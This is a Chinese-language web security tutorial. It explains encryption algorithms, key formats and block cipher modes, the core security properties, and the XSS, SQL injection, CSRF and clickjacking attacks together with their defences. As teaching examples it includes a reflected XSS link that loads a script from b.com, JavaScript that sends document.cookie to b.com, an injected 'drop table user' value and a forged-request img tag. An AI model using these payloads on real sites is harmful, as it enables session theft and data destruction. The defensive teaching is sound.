web安全技术

<一>加密机制
加密算法

数据加密算法有对称加密、非对称加密和信息摘要三类。
对称加密是使用单个密钥对数据进行加密和解密。有DES、AES、RC-5等算法。
非对称加密是使用一对密钥(公钥和私钥)对数据进行加密和解密。有RSA、ECC等算法。非对称加密大概比对称加密慢100倍以上。
通常的用法如下：
（1）、使用公钥加密数据，使用私钥解密数据。（2）、使用私钥签名数据，使用公钥验证签名。
信息摘要如果也算加密算法的话，它的加密过程不需要密钥，并且经过加密的数据无法被解密，它是根据不定长的明文计算得到一段定长的数据。有MD5、SHA1等算法。

 密钥规范

    密钥格式：

1、X.509：通用的证书格式，包括公钥信息、用户标识、签发信息等。
2、PKCS系统标准：美国RSA数据安全公司及其合作伙伴制定的一组公钥密码学标准。其中PKCS#8描述私有密钥的信息格式，包括私钥及可选的属性集等。

   密钥存储：

1、DER：二进制编码。
2、PEM：ASCII编码。

 加密模式

    块密码自身只能加密长度等于密码块长度的单块数据，若要对变长数据进行加密，则必须事先将数据进行切分，而且最后一个数据块需要适当的填充方式扩展到密码块的长度。加密模式即块密码的工作模式，就是使用这些方式用同一个密钥对多于一块的数据进行加密。
加密模式通常用于对称加密，也可以用于非对称加密。但非对称加密通常不适合加密较长的信息，所以会使用混合加密代替。
          PS: 以RSA和DES为例，混合加密通常使用DES先加密明文，再使用RSA的公钥加密DES的密钥，再将2个密文一起传递出去。接收方使用RSA的私钥解密DES的密钥信息，再使用DES的密钥解密具体内容。
   最简单的加密模式是ECB（即电子密码本）。其他还有CBC、PCBC、CFB等。
ECB和CBC需要对最后一块进行填充，填充方法有很多种，最简单的是先在明文的最后填充空字符，使明文长度为密码块长度的整数倍。

<二>安全要素

    信息安全的核心问题是要保障数据的合法使用者能够在任何需要该数据时获得保密的，没有被非法更改过的数据。主要有以下几要素：
机密性:保证数据内容不能泄露；用户的密码用明文保存，就破坏了机密性。
完整性:保证数据内容不被篡改；使用HTTP提交数据时，数据在传输过程中被篡改后再发往服务器，就破坏了完整性。
可用性:保证数据可被正常访问和使用；像拒绝服务攻击（DOS）就是破坏了可用性。
可审计性:记录对数据产生的操作，用于日后的分析、审查。
不可抵赖性:首先要保证数据完整性，然后，在传输的数据中必须携带用于身份识别的信息，且这部分信息在不同主体间不能发生碰撞。

<三>攻击和防御

  跨站脚本攻击（XSS）

跨站脚本攻击的英文全称是Cross Site Script，为了和样式表区分，缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上，在这个过程中可能有恶意代码被浏览器执行。
跨站脚本攻击可以分为两种：
1). 反射型XSS
 它是通过诱使用户打开一个恶意链接，服务端将链接中参数的恶意代码渲染到页面中，再传递给用户由浏览器执行，从而达到攻击的目的。如下面的链接：
http://a.com/a.jsp?name=xss<script>alert(1)</script> a.jsp将页面渲染成下面的html：
Hello xss<script>alert(1)</script>
这时浏览器将会弹出提示框。
2).
持久型XSS
持久型XSS将恶意代码提交给服务器，并且存储在服务器端，当用户访问相关内容时再渲染到页面中，以达到攻击的目的，它的危害更大。
比如，攻击者写了一篇带恶意JS代码的博客，文章发表后，所有访问该博客文章的用户都会执行这段恶意JS。

3).Cookie劫持

Cookie中一般保存了当前用户的登录凭证，如果可以得到，往往意味着可直接进入用户帐户，而Cookie劫持也是最常见的XSS攻击。以上面提过的反射型XSS的例子
来说，可以像下面这样操作：
首先诱使用户打开下面的链接： http://a.com/a.jsp?name=xss<script src=http://b.com/b.js></script>
用户打开链接后，会加载b.js，并执行b.js中的代码。b.js中存储了以下JS代码：
var img = document.createElement("img");
img.src ="http://b.com/log?" +
escape(document.cookie);document.body.appendChild(img);
上面的代码会向b.com请求一张图片，但实际上是将当前页面的cookie发到了b.com的服务器上。这样就完成了窃取cookie的过程。
防御Cookie劫持的一个简单的方法是在Set-Cookie时加上HttpOnly标识，浏览器禁止JavaScript访问带HttpOnly属性的Cookie。
XSS的防御
1). 输入检查
对输入数据做检查，比如用户名只允许是字母和数字，邮箱必须是指定格式。一定要在后台做检查，否则数据可能绕过前端检查直接发给服务器。一般前后端都
做检查，这样前端可以挡掉大部分无效数据。对特殊字符做编码或过滤，但因为不知道输出时的语境，所以可能会做不适当的过滤，
最好是在输出时具体情况具体处理。
2). 输出检查
对渲染到HTML中内容执行HtmlEncode，对渲染到JavaScript中的内容执行JavascriptEncode。
另外还可以使用一些做XSS检查的开源项目。

SQL注入

SQL注入常常会听到，它与XSS类似，是由于用户提交的数据被当成命令来执行而造成的。下面是一个SQL注入的例子：
String sql = "select * from user where username = '" + username + "'";
像上面的SQL语句，如果用户提交的username参数是leo，则数据库执行的SQL为：
select * from user where username = 'leo'
但如果用户提交的username参数是leo’; drop table user–，那执行的SQL为：
select * from user where username = 'leo'; drop table user--'
在查询数据后，又执行了一个删除表的操作，这样的后果非常严重。

SQL注入的防御

防止SQL注入最好的方法是使用预编译语句，如下面所示：
String sql = "select * from user where username= ?";
PreparedStatement pstmt =conn.prepareStatement(sql);
pstmt.setString(1, username);
ResultSet results = pstmt.executeQuery();
不同语言的预编译方法不同，但基本都可以处理。
如果遇到无法使用预编译方法时，只能像防止XSS那样对参数进行检查和编码。

跨站请求伪造（CSRF）

跨站请求伪造的英文全称是Cross Site Request Forgery，是由于操作所需的所有参数都能被攻击者得到，进而构造出一个伪造的请求，
在用户不知情的情况下被执行。看下面一个例子：
如果a.com网站需要用户登录后可以删除博客，删除博客的请求地址如下：
GET http://a.com/blog/delete?id=1 当用户登录a.com后，又打开了http://b.com/b.html，其中有下面的内容：
<img src="http://a.com/blog/delete?id=1"/>
这时会以用户在a.com的身份发送http://a.com/blog/delete?id=1，删除那篇博客。

CSRF的防御

验证码：CSRF是在用户不知情的情况下构造的网络情况，验证码则强制用户与应用交互，所以验证码可以很好得防止CSRF。但不能什么请求都加验证码。

referer检查：检查请求header中的referer也能帮助防止CSRF攻击，但服务器不是总能拿到referer，浏览器可能出于安全或隐私而不发送referer，所以也不常用。

倒是图片防盗链中用得很多。

Anti CSRF Token：更多的是生成一个随机的token，在用户提交数据的同时提交这个token，服务器端比对后如果不正确，则拒绝执行操作。

 

点击劫持（ClickJacking）

点击劫持是从视觉上欺骗用户。攻击者使用一个透明的iframe覆盖在一个网页上，诱使用户在该网页上操作，而实际点击却是点在透明的iframe页面。
点击劫持延伸出了很多攻击方式，有图片覆盖攻击、拖拽劫持等。

点击劫持的防御

针对iframe的攻击，可使用一个HTTP头：X-Frame-Options，它有三种可选值：
· DENY： 禁止任何页面的frame加载；

· SAMEORIGIN：只有同源页面的frame可加载；

· ALLOW-FROM：可定义允许frame加载的页面地址。

针对图片覆盖攻击，则注意使用预防XSS的方法，防止HTML和JS注入。